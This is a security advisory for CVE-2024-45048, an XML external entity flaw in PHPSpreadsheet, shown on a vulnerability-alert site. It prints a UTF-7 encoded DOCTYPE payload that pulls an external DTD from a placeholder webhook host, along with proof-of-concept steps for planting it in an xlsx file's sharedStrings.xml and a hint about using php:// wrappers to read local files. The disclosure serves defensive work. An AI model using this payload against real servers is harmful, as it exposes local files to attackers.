CVE-2024-45048: XML External Entity Reference (XXE) in PHPSpreadsheet

First published: Wed Aug 28 2024(Updated: )

### Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) ### Details Check ` $pattern = '/encoding="(.*?)"/';` easy to bypass. Just use a single quote symbol `'`. So payload looks like this: ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> ``` If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. ### PoC 1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode. 4) Replace `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` to ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]> ``` 5) Save `sharedStrings.xml` file and rename zip back to xlsx. 6) Use minimal php code that simply opens this xlsx file: ``` use PhpOffice\PhpSpreadsheet\IOFactory; require __DIR__ . '/vendor/autoload.php'; $spreadsheet = IOFactory::load("file.xlsx"); ``` 7) You will receive the request to your `http://%webhook%/file.dtd` 8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files. ### Impact Read local files 

Credit: security-advisories@github.com security-advisories@github.com

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• agent/weakness
• agent/title
• agent/type
• agent/first-publish-date
• agent/references
• agent/description
• agent/author
• collector/mitre-cve
• source/MITRE
• agent/severity
• agent/remedy
• collector/nvd-api
• source/NVD
• agent/software-canonical-lookup
• agent/software-canonical-lookup-request
• collector/nvd-cve
• agent/event
• agent/tags
• collector/github-advisory-latest
• source/GitHub
• alias/GHSA-ghg6-32f9-2jp7
• alias/CVE-2024-45048
• agent/last-modified-date
• collector/github-advisory
• agent/softwarecombine
• agent/trending
• vendor/phpoffice
• canonical/phpoffice phpspreadsheet
• version/phpoffice phpspreadsheet/2.0.0
• package-manager/composer